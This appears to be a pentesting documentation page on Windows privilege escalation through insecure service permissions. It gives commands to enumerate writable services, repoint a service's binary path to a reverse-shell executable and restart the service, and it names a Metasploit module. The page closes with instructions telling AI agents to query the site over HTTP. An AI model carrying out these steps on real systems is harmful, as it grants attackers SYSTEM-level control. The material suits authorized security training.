# Insecure Service Permissions

Services with Insecure service permissions could allow for privilege escalation. If the current user has the ability to write to or replace the service path binary and, the service is started with privileged permissions such as SYSTEM it could be possible to elevate, providing the service is running in.

`Acesschk.exe` can be used to check what permission a particular user has to services. A wildcard is used to check all services.

```bash
.\accesschk.exe /accepteula -uwcqv "<User>" *
```

![](/files/c8KQEt0pEsF1eSZPhZFD)

From the above output *SERVICE\_CHANGE\_CONFIG* indicates we are able to alter the service configuration and change the binary path.

![](/files/zxGnnGlszfm27px0qlh9)

As from the above value *SERVICE\_START\_NAME* represents the user in which the service runs under.

The command below can be used to alter the binary to a new, malicious binary.

```bash
sc config daclsvc binpath= "\"C:\PrivEsc\reverse_shell.exe\""
```

Once the binary path has been changed the service can then be started by either using the command below or rebooting the system if permissions allow.

```bash
net start <ServiceName>
```

**Interesting Service permissions**

| Permission              | Description                                          |
| ----------------------- | ---------------------------------------------------- |
| GENERIC\_ALL            | Inherits SERVICE\_CHANGE\_CONFIG                     |
| GENERIC\_WRITE          | Inherits SERVICE\_CHANGE\_CONFIG                     |
| SERVICE\_CHANGE\_CONFIG | Able to alter service binary                         |
| WRITE\_DAC              | Able to alter permissions -> SERVICE\_CHANGE\_CONFIG |
| WRITE\_OWNER            | Able to become owner and change permissions          |

### Metasploit Module

```
use exploit/windows/local/service_permissions
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/privilege-escalation/service-exploits/insecure-service-permissions.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.